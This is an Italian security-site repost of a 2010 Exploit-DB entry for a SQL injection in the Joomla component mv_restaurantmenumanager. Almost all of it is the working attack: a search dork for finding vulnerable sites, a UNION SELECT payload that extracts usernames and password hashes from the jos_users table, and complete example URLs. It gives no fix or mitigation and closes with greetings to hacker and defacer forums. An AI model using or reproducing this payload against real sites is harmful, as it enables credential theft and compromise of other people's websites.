Sei qui: Servizi 
Sicurezza CMS Vulnerabilità Joomla component mv_restaurantmenumanager SQL injection Vulnerability
Sicurezza CMS Vulnerabilità Joomla component mv_restaurantmenumanager SQL injection Vulnerability
Creato Lunedì, 12 Aprile 2010 09:14
# EDB-ID: 12162
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Sudden_death
# Published: 2010-04-11
# Verified: no
# Download Exploit Code
# Download N/A
========================================================= |
Joomla component mv_restaurantmenumanager SQL injection Vulnerability |
========================================================= |
# Exploit Title : joomla component mv_restaurantmenumanager SQL injection Vulnerability |
# Date : 12 april 2010 |
# Author : Sudden_death (
Questo indirizzo email è protetto dagli spambots. E' necessario abilitare JavaScript per vederlo.
) |
# Software Link : N/A |
# Tested on : Windows XP 2 |
# Platform/Tested on: Windows XP 2 SP 2 |
# category : webapps/0day |
# myweb : http://suddendeath.000space.com/ |
# dork : inurl:option=com_mv_restaurantmenumanager |
# Code :+and+1=2+union+select+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12+from+jos_users |
====================================================================== |
# EXPLOIT / c0de |
+and+1=2+union+select+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12+from+jos_users |
# VULN IN HERE |
http://localhost/joomla/index.php?option=com_mv_restaurantmenumanager&task=menu_display&Venue=1&mid=5[c0de<http://localhost/joomla/index.php?option=com_mv_restaurantmenumanager&task=menu_display&Venue=1&mid=5%5Bc0de>} |
# EXAMPLE |
http://localhost/joomla/index.php?option=com_mv_restaurantmenumanager&task=menu_display&Venue=1&mid=5+and+1=2+union+select+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12+from+jos_users<http://localhost/joomla/index.php?option=com_mv_restaurantmenumanager&task=menu_display&Venue=1&mid=5+and+1=2+union+select+1,2,group_concat%28username,0x3a,password%29,4,5,6,7,8,9,10,11,12+from+jos_users> |
[#]------------------------------------------------------------------- |
GREETZ TO WE FORUM: |
[ indonesianhacker[dot]com | indonesiandefacer[dot]org ] |
[#]------------------------------------------------------------------- |
MY BROTHA : |
| MISTERFRIBO | BobyPutrA | Syst3m_RtO | bumble_be | CS-31 | d43ngCyb3r | Ichito-Bandito | james0baster | |
| kaMtiEz | Man In Black | otong | r3m1ck's | shadowsmaker | SyNTaX ErRoR | iJoo | FLYFF666 | LOL1ds | |
| cah_surip | demnas | RXn7 | and all crew indonesia hacker :D | |
[#]------------------------------------------------------------------- |
note :jangan mengatakan setiap apa yang engkau ketahui tapi ketahuilah setiap apa yang kau katakan! |
Categoria: Vulnerabilità Joomla